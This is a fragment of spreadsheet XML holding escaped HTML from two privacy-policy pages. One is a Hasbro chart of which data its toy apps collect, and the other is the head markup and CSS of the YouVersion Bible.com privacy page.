    <t>Scanning Activity"&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;NERF LaserOps Pro&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Play-Doh Touch&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Smart R2-D2&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy</t>
  </si>
  <si>
    <t>Scanning Activity"&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt; Star Wars Lightsaber Academy&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;</t>
  </si>
  <si>
    <t>Star Wars Studio FX&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt; Star Wars Ultimate D-O&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy</t>
  </si>
  <si>
    <t>Scanning Activity"&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt; Transformers: Bee Vision&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Transformers: Robots in Disguise&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td</t>
  </si>
  <si>
    <t>data-th="Toy Scanning Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Transformers TCG&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/p&gt;
&lt;p&gt; &lt;a href="#Hasbro"&gt;Back to top&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#2b5aaf;"&gt;What Does the Chart Mean?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span styl</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;meta charSet="utf-8"/&gt;&lt;meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport"/&gt;&lt;link href="https://www.bible.com/privacy" rel="canonical"/&gt;&lt;meta content="201895780642-g4oj7hm4p3h81eg7b1di2l2l93k5gcm3.apps.googleusercontent.com" name="google-signin-client_id"/&gt;&lt;meta content="profile email" name="google-signin-scope"/&gt;&lt;meta content="5a5e821bd8df3c93" name="yandex-verification"/&gt;&lt;meta content="https://www.bible.com/privacy" name="url"/&gt;&lt;meta content="YouVersion | The Bible App | Bible.com" property="og:site_name"/&gt;&lt;meta content="website" property="og:type"/&gt;&lt;meta content="https://www.bible.com/privacy" property="og:url"/&gt;&lt;meta content="YouVersion Privacy Policy | The Bible App | Bible.com" property="og:title"/&gt;&lt;meta content="Bring the beauty and truth of the Bible into everyday life. With the YouVersion Bible App, you can read, watch, listen, and share on your smartphone or tablet, and online at Bible.com." name="description"/&gt;&lt;meta content="Bring the beauty and truth of the Bible into everyday life.</t>
  </si>
  <si>
    <t>With the YouVersion Bible App, you can read, watch, listen, and share on your smartphone or tablet, and online at Bible.com." property="og:description"/&gt;&lt;meta content="/assets/icons/bible/200/en.png" property="og:image"/&gt;&lt;meta content="200" property="og:image:height"/&gt;&lt;meta content="200" property="og:image:width"/&gt;&lt;meta content="@YouVersion" name="twitter:site"/&gt;&lt;meta content="summary" name="twitter:card"/&gt;&lt;meta content="@YouVersion" name="twitter:creator"/&gt;&lt;meta content="YouVersion Privacy Policy | The Bible App | Bible.com" name="twitter:title"/&gt;&lt;meta content="/assets/icons/bible/200/en.png" name="twitter:image"/&gt;&lt;meta content="https://www.bible.com/privacy" name="twitter:url"/&gt;&lt;meta content="Bring the beauty and truth of the Bible into everyday life. With the YouVersion Bible App, you can read, watch, listen, and share on your smartphone or tablet, and online at Bible.com."</t>
  </si>
  <si>
    <t>name="twitter:description"/&gt;&lt;meta content="Bible" name="twitter:app:name:iphone"/&gt;&lt;meta content="282935706" name="twitter:app:id:iphone"/&gt;&lt;meta content="Bible" name="twitter:app:name:ipad"/&gt;&lt;meta content="282935706" name="twitter:app:id:ipad"/&gt;&lt;meta content="Bible" name="twitter:app:name:googleplay"/&gt;&lt;meta content="com.sirma.mobile.bible.android" name="twitter:app:id:googleplay"/&gt;&lt;meta content="105030176203924" name="fb:app_id"/&gt;&lt;meta content="The Bible App" name="branch:deeplink:$journeys_title"/&gt;&lt;meta content="Open" name="branch:deeplink:$journeys_button_get_has_app"/&gt;&lt;meta content="Download" name="branch:deeplink:$journeys_button_get_no_app"/&gt;&lt;meta content="/assets/icons/bible/120/en.png" name="branch:deeplink:$journeys_icon_image_url"/&gt;&lt;meta content="en" http-equiv="content-language"/&gt;&lt;meta content="af5f6405-7860-49a9-a6b4-a47381974e1d" name="msApplication-ID"/&gt;&lt;meta content="LifeChurch.tv.Bible_d1phjsdba8cbj" name="msApplication-PackageFamilyName"/&gt;&lt;link href="https://www.bible.com/af/privacy" hrefLang="af" rel="alternate"/&gt;&lt;link href="https://www.bible.com/am/privacy" hrefLang="am" rel="alternate"/&gt;&lt;link href="https://www.bible.com/aml/privacy" hrefLang="aml" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ar/privacy" hrefLang="ar" rel="alternate"/&gt;&lt;link href="https://www.bible.com/as/privacy" hrefLang="as" rel="alternate"/&gt;&lt;link href="https://www.bible.com/be/privacy" hrefLang="be" rel="alternate"/&gt;&lt;link href="https://www.bible.com/bg/privacy" hrefLang="bg" rel="alternate"/&gt;&lt;link href="https://www.bible.com/bn/privacy" hrefLang="bn" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ca/privacy" hrefLang="ca" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ckb/privacy" hrefLang="ckb" rel="alternate"/&gt;&lt;link href="https://www.bible.com/cs/privacy" hrefLang="cs" rel="alternate"/&gt;&lt;link href="https://www.bible.com/cy/privacy" hrefLang="cy" rel="alternate"/&gt;&lt;link href="https://www.bible.com/da/privacy" hrefLang="da" rel="alternate"/&gt;&lt;link href="https://www.bible.com/de/privacy" hrefLang="de" rel="alternate"/&gt;&lt;link href="https://www.bible.com/el/privacy" hrefLang="el" rel="alternate"/&gt;&lt;link href="https://www.bible.com/en/privacy" hrefLang="en" rel="alternate"/&gt;&lt;link href="https://www.bible.com/en-gb/privacy" hrefLang="en-gb" rel="alternate"/&gt;&lt;link href="https://www.bible.com/eo/privacy" hrefLang="eo" rel="alternate"/&gt;&lt;link href="https://www.bible.com/es/privacy" hrefLang="es" rel="alternate"/&gt;&lt;link href="https://www.bible.com/es-es/privacy" hrefLang="es-es" rel="alternate"/&gt;&lt;link href="https://www.bible.com/et/privacy" hrefLang="et" rel="alternate"/&gt;&lt;link href="https://www.bible.com/fa/privacy" hrefLang="fa" rel="alternate"/&gt;&lt;link href="https://www.bible.com/fi/privacy" hrefLang="fi" rel="alternate"/&gt;&lt;link href="https://www.bible.com/fr/privacy" hrefLang="fr" rel="alternate"/&gt;&lt;link href="https://www.bible.com/gu/privacy" hrefLang="gu" rel="alternate"/&gt;&lt;link href="https://www.bible.com/he/privacy" hrefLang="he" rel="alternate"/&gt;&lt;link href="https://www.bible.com/hi/privacy" hrefLang="hi" rel="alternate"/&gt;&lt;link href="https://www.bible.com/hr/privacy" hrefLang="hr" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ht/privacy" hrefLang="ht" rel="alternate"/&gt;&lt;link href="https://www.bible.com/hu/privacy" hrefLang="hu" rel="alternate"/&gt;&lt;link href="https://www.bible.com/hy/privacy" hrefLang="hy" rel="alternate"/&gt;&lt;link href="https://www.bible.com/id/privacy" hrefLang="id" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ig/privacy" hrefLang="ig" rel="alternate"/&gt;&lt;link href="https://www.bible.com/is/privacy" hrefLang="is" rel="alternate"/&gt;&lt;link href="https://www.bible.com/it/privacy" hrefLang="it" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ja/privacy" hrefLang="ja" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ka/privacy" hrefLang="ka" rel="alternate"/&gt;&lt;link href="https://www.bible.com/km/privacy" hrefLang="km" rel="alternate"/&gt;&lt;link href="https://www.bible.com/kn/privacy" hrefLang="kn" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ko/privacy" hrefLang="ko" rel="alternate"/&gt;&lt;link href="https://www.bible.com/lt/privacy" hrefLang="lt" rel="alternate"/&gt;&lt;link href="https://www.bible.com/lv/privacy" hrefLang="lv" rel="alternate"/&gt;&lt;link href="https://www.bible.com/mk/privacy" hrefLang="mk" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ml/privacy" hrefLang="ml" rel="alternate"/&gt;&lt;link href="https://www.bible.com/mn/privacy" hrefLang="mn" rel="alternate"/&gt;&lt;link href="https://www.bible.com/mr/privacy" hrefLang="mr" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ms/privacy" hrefLang="ms" rel="alternate"/&gt;&lt;link href="https://www.bible.com/my/privacy" hrefLang="my" rel="alternate"/&gt;&lt;link href="https://www.bible.com/my-mm/privacy" hrefLang="my-mm" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ne/privacy" hrefLang="ne" rel="alternate"/&gt;&lt;link href="https://www.bible.com/nl/privacy" hrefLang="nl" rel="alternate"/&gt;&lt;link href="https://www.bible.com/no/privacy" hrefLang="no" rel="alternate"/&gt;&lt;link href="https://www.bible.com/pa/privacy" hrefLang="pa" rel="alternate"/&gt;&lt;link href="https://www.bible.com/pl/privacy" hrefLang="pl" rel="alternate"/&gt;&lt;link href="https://www.bible.com/pt/privacy" hrefLang="pt" rel="alternate"/&gt;&lt;link href="https://www.bible.com/pt-pt/privacy" hrefLang="pt-pt" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ro/privacy" hrefLang="ro" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ru/privacy" hrefLang="ru" rel="alternate"/&gt;&lt;link href="https://www.bible.com/si/privacy" hrefLang="si" rel="alternate"/&gt;&lt;link href="https://www.bible.com/sk/privacy" hrefLang="sk" rel="alternate"/&gt;&lt;link href="https://www.bible.com/sl/privacy" hrefLang="sl" rel="alternate"/&gt;&lt;link href="https://www.bible.com/sn/privacy" hrefLang="sn" rel="alternate"/&gt;&lt;link href="https://www.bible.com/sq/privacy" hrefLang="sq" rel="alternate"/&gt;&lt;link href="https://www.bible.com/sr/privacy" hrefLang="sr" rel="alternate"/&gt;&lt;link href="https://www.bible.com/sv/privacy" hrefLang="sv" rel="alternate"/&gt;&lt;link href="https://www.bible.com/sw/privacy" hrefLang="sw" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ta/privacy" hrefLang="ta" rel="alternate"/&gt;&lt;link href="https://www.bible.com/te/privacy" hrefLang="te" rel="alternate"/&gt;&lt;link href="https://www.bible.com/tg/privacy" hrefLang="tg" rel="alternate"/&gt;&lt;link href="https://www.bible.com/th/privacy" hrefLang="th" rel="alternate"/&gt;&lt;link href="https://www.bible.com/tl/privacy" hrefLang="tl" rel="alternate"/&gt;&lt;link href="https://www.bible.com/tr/privacy" hrefLang="tr" rel="alternate"/&gt;&lt;link href="https://www.bible.com/uk/privacy" hrefLang="uk" rel="alternate"/&gt;&lt;link href="https://www.bible.com/ur/privacy" hrefLang="ur" rel="alternate"/&gt;&lt;link href="https://www.bible.com/usi/privacy" hrefLang="usi" rel="alternate"/&gt;&lt;link href="https://www.bible.com/uz/privacy" hrefLang="uz" rel="alternate"/&gt;&lt;link href="https://www.bible.com/vi/privacy" hrefLang="vi" rel="alternate"/&gt;&lt;link href="https://www.bible.com/yo/privacy" hrefLang="yo" rel="alternate"/&gt;&lt;link href="https://www.bible.com/zh-cn/privacy" hrefLang="zh-cn" rel="alternate"/&gt;&lt;link href="https://www.bible.com/zh-hk/privacy" hrefLang="zh-hk" rel="alternate"/&gt;&lt;link href="https://www.bible.com/zh-tw/privacy" hrefLang="zh-tw" rel="alternate"/&gt;&lt;link href="https://www.bible.com/zu/privacy" hrefLang="zu" rel="alternate"/&gt;&lt;title&gt; YouVersion Privacy Policy | The Bible App | Bible.com&lt;/title&gt;&lt;meta name="next-head-count" content="120"/&gt;&lt;style data-emotion="bible-global 0"&gt;&lt;/style&gt;&lt;style data-emotion="bible-global dnf3d7"&gt;:host,:root,[data-theme]{--chakra-ring-inset:var(--chakra-empty,/*!*/ /*!*/);--chakra-ring-offset-width:0px;--chakra-ring-offset-color:#fff;--chakra-ring-color:rgba(66, 153, 225, 0.6);--chakra-ring-offset-shadow:0 0 #0000;--chakra-ring-shadow:0 0 #0000;--chakra-space-x-reverse:0;--chakra-space-y-reverse:0;--colors-white:#FFFFFF;--colors-black:#000000;--colors-gray-5:#F8F9F9;--colors-gray-10:#EDEFEF;--colors-gray-15:#D0D2D2;--colors-gray-20:#9EA1A2;--colors-gray-25:#777A7B;--colors-gray-30:#4F5354;--colors-gray-35:#3D4243;--colors-gray-40:#2B3031;--colors-gray-45:#1F2122;--colors-gray-50:#121212;--colors-teal-10:#E6F2F3;--colors-teal-20:#80BDC4;--colors-teal-30:#007B89;--colors-teal-40:#004A52;--colors-teal-50:#002529;--colors-blue-10:#E7F2FD;--colors-blue-20:#9EBCE1;--colors-blue-30:#3D79C2;--colors-blue-40:#29537A;--colors-blue-50:#1C2A3B;--colors-blue-30DM:#2A85F4;--colors-purple-10:#F2EEF3;--colors-purple-20:#BCA8C5;--colors-purple-30:#79518A;--colors-purple-40:#483550;--colors-purple-50:#241829;--colors-magenta-10:#F5EAEE;--colors-magenta-20:#CC96AA;--colors-magenta-30:#992C55;--colors-magenta-40:#5C1A33;--colors-magenta-50:#2E0D19;--colors-orange-10:#FAECEB;--colors-orange-20:#E59F9A;--colors-orange-30:#CA3E35;--colors-orange-40:#7A2629;--colors-orange-50:#3D1310;--colors-orange-30DM:#F23B22;--colors-yellow-10:#FEF5EB;--colors-yellow-20:#F8CB94;--colors-yellow-30:#F19C33;--colors-yellow-40:#975C11;--colors-yellow-50:#4C2D08;--colors-green-10:#EEF6F0;--colors-green-20:#ABD0B6;--colors-green-30:#57A16C;--colors-green-40:#346148;--colors-green-50:#1A3026;--colors-green-30DM:#4AAE67;--colors-brand-light:#FF3D4D;--colors-brand-dark:#F04C59;--colors-brand-warmNeutral:#F6EFEE;--colors-canvas-light-default:#FFFFFF;--colors-canvas-light-secondary:#F8F9F9;--colors-canvas-dark-default:#121212;--colors-canvas-dark-secondary:#1F2122;--colors-overlay-light:rgba(18, 18, 18, 0.75);--colors-overlay-dark:rgba(0, 0, 0, 0.75);--colors-thinLine-light:#D0D2D2;--colors-thinLine-dark:#4F5354;--colors-typography-primary-light:#121212;--colors-typography-primary-dark:#FFFFFF;--colors-typography-muted-light:#777A7B;--colors-typography-muted-dark:#9EA1A2;--colors-typography-red-light:#FF3D4D;--colors-typography-red-dark:#F04C59;--colors-typography-blue-light:#3D79C2;--colors-typography-blue-dark:#2A85F4;--colors-utility-success-light:#57A16C;--colors-utility-success-dark:#4AAE67;--colors-utility-info-light:#3D79C2;--colors-utility-info-dark:#2A85F4;--colors-utility-alert-light:#CA3E35;--colors-utility-alert-dark:#F23B22;--borders-none:0;--borders-1px:1px solid;--borders-2px:2px solid;--borders-4px:4px solid;--borders-8px:8px solid;--fonts-heading:Aktiv Grotesk,"Helvetica Neue",HelveticaNeue,Helvetica,Arial,sans-serif;--fonts-body:Aktiv Grotesk,"Helvetica Neue",HelveticaNeue,Helvetica,Arial,sans-serif;--fonts-secondary:Untitled Serif,Baskerville,Georgia,Times New Roman,serif;--fonts-aktivGroteskExpanded:Aktiv Grotesk Expanded,Aktiv Grotesk,"Helvetica Neue",HelveticaNeue,Helvetica,Arial,sans-serif;--fontSizes-11:0.6875rem;--fontSizes-13:0.8125rem;--fontSizes-16:1rem;--fontSizes-19:1.1875rem;--fontSizes-23:1.4375rem;--fontSizes-28:1.75rem;--fontSizes-33:2.0625rem;--fontSizes-40:2.5rem;--fontSizes-48:3rem;--fontSizes-57:3.5625rem;--fontSizes-69:4.3125rem;--fontSizes-83:5.1875rem;--fontSizes-99:6.1875rem;--fontSizes-119:7.4375rem;--fontSizes-143:8.9375rem;--fontWeights-normal:400;--fontWeights-medium:500;--fontWeights-bold:700;--fontWeights-xbold:800;--letterSpacings-tighter:-0.05em;--letterSpacings-tight:-0.025em;--letterSpacings-normal:0;--letterSpacings-wide:0.025em;--letterSpacings-wider:0.05em;--letterSpacings-widest:0.1em;--lineHeights-0:0;--lineHeights-tight:1;--lineHeights-comfy:1.1;--lineHeights-default:1.25;--lineHeights-loose:1.5;--radii-none:0;--radii-sm:0.125rem;--radii-base:0.25rem;--radii-md:0.375rem;--radii-lg:0.5rem;--radii-xl:0.75rem;--radii-2xl:1rem;--radii-3xl:1.5rem;--radii-full:9999px;--space-1:0.5rem;--space-2:1rem;--space-3:1.5rem;--space-4:2rem;--space-5:2.5rem;--space-6:3rem;--space-8:4rem;--space-10:5rem;--space-12:6rem;--space-16:8rem;--space-20:10rem;--space-px:1px;--space-0-25:0.125rem;--space-0-5:0.25rem;--space-1-5:0.75rem;--shadows-light-1:0px 1px 3px rgba(18, 18, 18, 0.15);--shadows-light-2:0px 2px 6px rgba(18, 18, 18, 0.15);--shadows-light-4:0px 4px 12px rgba(18, 18, 18, 0.15);--shadows-light-8:0px 8px 24px rgba(18, 18, 18, 0.15);--shadows-light-12:0px 12px 36px rgba(18, 18, 18, 0.15);--shadows-light-2-risk:0px</t>
  </si>
  <si>
    <t>2px 6px rgba(206, 74, 65, 0.25);--shadows-dark-1:0px 1px 3px rgba(0, 0, 0, 0.45);--shadows-dark-2:0px 2px 6px rgba(0, 0, 0, 0.45);--shadows-dark-4:0px 4px 12px rgba(0, 0, 0, 0.5);--shadows-dark-8:0px 8px 24px rgba(0, 0, 0, 0.45);--shadows-dark-12:0px 12px 36px rgba(0, 0, 0, 0.45);--shadows-dark-2-risk:0px 2px 6px rgba(248, 75, 52, 0.25);--sizes-0:0%;--sizes-1:0.5rem;--sizes-2:1rem;--sizes-3:1.5rem;--sizes-4:2rem;--sizes-5:2.5rem;--sizes-6:3rem;--sizes-8:4rem;--sizes-10:5rem;--sizes-12:6rem;--sizes-16:8rem;--sizes-20:10rem;--sizes-px:1px;--sizes-0-25:0.125rem;--sizes-0-5:0.25rem;--sizes-1-5:0.75rem;--sizes-1\/2:50%;--sizes-1\/3:33.333333%;--sizes-2\/3:66.666667%;--sizes-1\/4:25%;--sizes-2\/4:50%;--sizes-3\/4:75%;--sizes-1\/5:20%;--sizes-2\/5:40%;--sizes-3\/5:60%;--sizes-4\/5:80%;--sizes-1\/6:16.666667%;--sizes-2\/6:33.333333%;--sizes-3\/6:50%;--sizes-4\/6:66.666667%;--sizes-5\/6:83.333333%;--sizes-full:100%;--sizes-max:max-content;--sizes-min:min-content;--sizes-container-sm:640px;--sizes-container-md:768px;--sizes-container-lg:1024px;--sizes-container-xl:1200px;--zIndices-hide:-1;--zIndices-auto:auto;--zIndices-base:0;--zIndices-docked:10;--zIndices-dropdown:1000;--zIndices-sticky:1100;--zIndices-banner:1200;--zIndices-overlay:1300;--zIndices-modal:1400;--zIndices-popover:1500;--zIndices-skipLink:1600;--zIndices-toast:1700;--zIndices-tooltip:1800;--transition-property-common:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform;--transition-property-colors:background-color,border-color,color,fill,stroke;--transition-property-dimensions:width,height;--transition-property-position:left,right,top,bottom;--transition-property-background:background-color,background-image,background-position;--transition-easing-ease-in:cubic-bezier(0.4, 0, 1, 1);--transition-easing-ease-out:cubic-bezier(0, 0, 0.2, 1);--transition-easing-ease-in-out:cubic-bezier(0.4, 0, 0.2, 1);--transition-duration-ultra-fast:50ms;--transition-duration-faster:100ms;--transition-duration-fast:150ms;--transition-duration-normal:200ms;--transition-duration-slow:300ms;--transition-duration-slower:400ms;--transition-duration-ultra-slow:500ms;--blur-none:0;--blur-sm:4px;--blur-base:8px;--blur-md:12px;--blur-lg:16px;--blur-xl:24px;--blur-2xl:40px;--blur-3xl:64px;--breakpoints-sm:0em;--breakpoints-md:40em;--breakpoints-lg:62em;--breakpoints-xl:90em;--breakpoints-base:0px;}.chakra-ui-light :host:not([data-theme]),.chakra-ui-light :root: not([data-theme]),.chakra-ui-light</t>
  </si>
  <si>
    <t>[data-theme]:not([data-theme]),[data-theme=light] :host:not([data-theme]),[data-theme=light] :root:not([data-theme]),[data-theme=light] [data-theme]:not([data-theme]),:host[data-theme=light],:root[data-theme=light],[data-theme][data-theme=light]{--colors-chakra-body-bg:var(--colors-white);}.chakra-ui-dark :host:not([data-theme]),.chakra-ui-dark :root:not([data-theme]),.chakra-ui-dark [data-theme]:not([data-theme]),[data-theme=dark] :host:not([data-theme]),[data-theme=dark] :root:not([data-theme]),[data-theme=dark]</t>
  </si>
  <si>
    <t>[data-theme]:not([data-theme]),:host[data-theme=dark],:root[data-theme=dark],[data-theme][data-theme=dark]{--colors-chakra-body-bg:var(--colors-gray-50);}&lt;/style&gt;&lt;style data-emotion="bible-global lz6mpf"&gt;html{line-height:1.5;-webkit-text-size-adjust:100%;font-family:system-ui,sans-serif;-webkit-font-smoothing:antialiased;text-rendering:optimizeLegibility;-moz-osx-font-smoothing:grayscale;touch-action:manipulation;}body{position:relative;min-height:100%;font-feature-settings:'kern';}*,*::before,*::after{border-width:0;border-style:solid;box-sizing:border-box;}main{display:block;}hr{border-top-width:1px;box-sizing:content-box;height:0;overflow:visible;}pre,code,kbd,samp{font-family:SFMono-Regular,Menlo,Monaco,Consolas,monospace;font-size:1em;}a{background-color:transparent;color:inherit;-webkit-text-decoration:inherit;text-decoration:inherit;}abbr[title]{border-bottom:none;-webkit-text-decoration:underline;text-decoration:underline;-webkit-text-decoration:underline dotted;-webkit-text-decoration:underline dotted;text-decoration:underline 